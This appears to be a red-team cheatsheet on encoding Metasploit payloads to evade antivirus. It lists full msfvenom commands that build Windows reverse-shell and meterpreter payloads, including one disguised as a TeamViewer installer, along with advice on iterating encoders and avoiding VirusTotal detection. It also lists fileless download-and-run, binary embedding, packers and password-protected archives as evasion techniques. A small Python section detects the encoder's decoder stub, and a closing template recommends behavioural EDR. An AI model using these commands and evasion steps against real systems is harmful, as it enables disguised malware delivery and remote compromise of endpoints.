Methodology Checklist
- Identify target AV engine if possible
- List available encoders: show encoders
- Encode payload: msfvenom -p [PAYLOAD] -e [ENCODER] -i [ITERATIONS] -f [FORMAT]
- x86 target: use x86/shikata_ga_nai
- Test encoded payload against AV (VirusTotal; be careful with operational payloads)
- If still detected: increase iterations or use multiple chained encoders
- Note: encoding alone rarely bypasses modern AV; combine with custom shellcode
Operational Context
Use when: Basic AV is flagging msfvenom payloads; apply shikata_ga_nai or other encoders to change the binary signature.
Think Dumber First: Encoding alone won't beat modern EDR. Use 5+ iterations of shikata_ga_nai for basic AV, but combine with Veil or custom shellcode loaders for EDR environments. Test VirusTotal (non-submitting mode) before delivery.
Skip when: Target has behavioral EDR; encoding only defeats static signature scanning.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=[TARGET_IP] LPORT=4444 -b "\x00" -f perl | Remove null bytes from payload |
| msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=[TARGET_IP] LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai | Apply Shikata Ga Nai encoder |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TARGET_IP] LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe | 10-iteration encoded EXE |
| show encoders | List encoders compatible with current module/payload |
| msf-virustotal -k [API_KEY] -f [FILENAME].exe | Check payload against VirusTotal |
| hashid -j [HASH] | Identify hash type and JtR format |
| hashid -m [HASH] | Identify hash type and Hashcat mode |
Deep Dive & Workflow
Three Reasons to Encode
- Architecture compatibility: ensure the payload runs on the target CPU (x86, x64, MIPS, etc.)
- Bad character removal: strip opcodes (like null \x00) that would break the exploit buffer during overflow exploitation
- AV evasion (legacy): historically worked; modern AV has caught up
Shikata Ga Nai (SGN): Reality Check
"It cannot be helped": once the gold standard, now widely detected.
| Iterations | Detection Rate |
|---|---|
| 1x SGN | ~54/69 engines on VirusTotal |
| 10x SGN | ~52/65 engines on VirusTotal |
Encoding does NOT reliably bypass modern AV. It may bypass disk-based static scans, but behavioral/memory analysis still catches it at execution time. Use encoding for:
- Removing bad chars from overflow exploits (legitimate use)
- Bypassing older AV / simple hash-based detection
- Never as your only evasion strategy
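Added here as an example (not part of the original cheatsheet) covering the two points above: the bad-character check that -b is meant to satisfy, and why encoded output is still caught, namely the recognisable GetPC sequence in the shikata_ga_nai decoder stub. The sample byte strings are constructed for illustration, and the fnstenv-plus-pop matcher is a heuristic, not a production signature.

```python
import re

# Constructed sample blob (not real msfvenom output): bytes shaped like the start of a
# shikata_ga_nai decoder (fldz; fnstenv [esp-0xc]; pop ebx; xor ecx,ecx; mov cl,0x4c)
# followed by NOP filler.
SAMPLE_STUB = bytes.fromhex("d9eed97424f45b31c9b14c") + b"\x90" * 4

# Constructed sample with embedded nulls, standing in for an unencoded payload.
RAW_WITH_NULLS = b"\x90\x00\x41\x00\x42"


def find_bad_chars(payload, bad=b"\x00"):
    """Return (offset, byte) for every bad character left in the blob.

    This is the property msfvenom -b promises; run it over the *final* output,
    decoder stub included, before pasting it into an overflow buffer.
    """
    return [(i, b) for i, b in enumerate(payload) if b in bad]


# shikata_ga_nai recovers EIP with fnstenv [esp-0xc] (d9 74 24 f4) and a pop r32
# (58..5f) shortly after it. The FPU instruction placed before fnstenv and the block
# order around it are randomised per run, so the leading bytes change but this pair
# does not; that is what "signature in the decoder stub" means in practice.
FNSTENV_GETPC = re.compile(rb"\xd9\x74\x24\xf4.{0,8}?[\x58-\x5f]", re.DOTALL)


def find_fnstenv_getpc(blob):
    """Offsets where the fnstenv GetPC pattern appears (heuristic match)."""
    return [m.start() for m in FNSTENV_GETPC.finditer(blob)]


def assess(blob, bad=b"\x00"):
    """Summarise both checks for one blob."""
    bad_hits = find_bad_chars(blob, bad)
    return {
        "bad_chars": bad_hits,
        "bad_char_free": bad_hits == [],
        "getpc_offsets": find_fnstenv_getpc(blob),
    }


if __name__ == "__main__":
    print("unencoded:", assess(RAW_WITH_NULLS))
    print("stub     :", assess(SAMPLE_STUB))
```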
When Encoding Actually Helps
```bash
# Buffer overflow: payload has null bytes that terminate strcpy
# Encoding strips \x00 so the whole payload is copied
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=443 -b "\x00" -f c
```
Better Evasion Alternatives
| Technique | Method |
|---|---|
| Fileless execution | IEX DownloadString (never hits disk) |
| Executable templates | -x flag (embed in legit binary) |
| Custom shellcode | Manual assembly modification |
| Packers | UPX, Themida, Enigma Protector |
| Archive + password | Password-protected RAR: evades auto-scan |
show encoders: Context-Aware Filtering
Inside an active exploit module, show encoders only displays encoders compatible with your current target architecture and payload. If targeting x64, x86 encoders won't appear.
Using msf-virustotal
```bash
msf-virustotal -k <your_API_key> -f encoded_shell.exe
# Output: Analysis Report: encoded_shell.exe (51 / 68)
```
Requires a free VirusTotal API key. Useful for quick pre-engagement AV testing without leaving msfconsole.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| shikata_ga_nai encoder returns error | x86 payload required for this encoder | Ensure payload is x86 not x64; shikata_ga_nai is x86-only |
| Encoded payload still detected | Single encoding pass insufficient | Increase iterations: -i 10; combine with custom obfuscation wrapper |
| Encoded EXE won't run on target | Decoder stub crashes | Architecture mismatch: verify target is x86 or use x64-compatible encoder |
| No matching encoders for payload | Platform/arch filter | Run msfvenom --list encoders and filter by compat: msfvenom -p [PAYLOAD] --list-encoders |
| VirusTotal scan shows high detection | Signature in decoder stub | Avoid VirusTotal uploads; use offline scanning with ClamAV or Windows Defender locally |
Reporting Trigger
Finding Title: Encoded Payload Bypasses Signature-Based AV Detection
Impact: Payload encoding changes binary signatures to evade static AV scanning, enabling payload delivery to endpoints protected by signature-based antivirus without triggering quarantine.
Root Cause: AV solution relies on static signature matching without behavioral analysis. No sandbox detonation for unknown executables.
Recommendation: Upgrade to a behavioral EDR solution. Implement sandbox detonation for all downloaded executables. Disable legacy antivirus-only products in favor of next-generation EDR.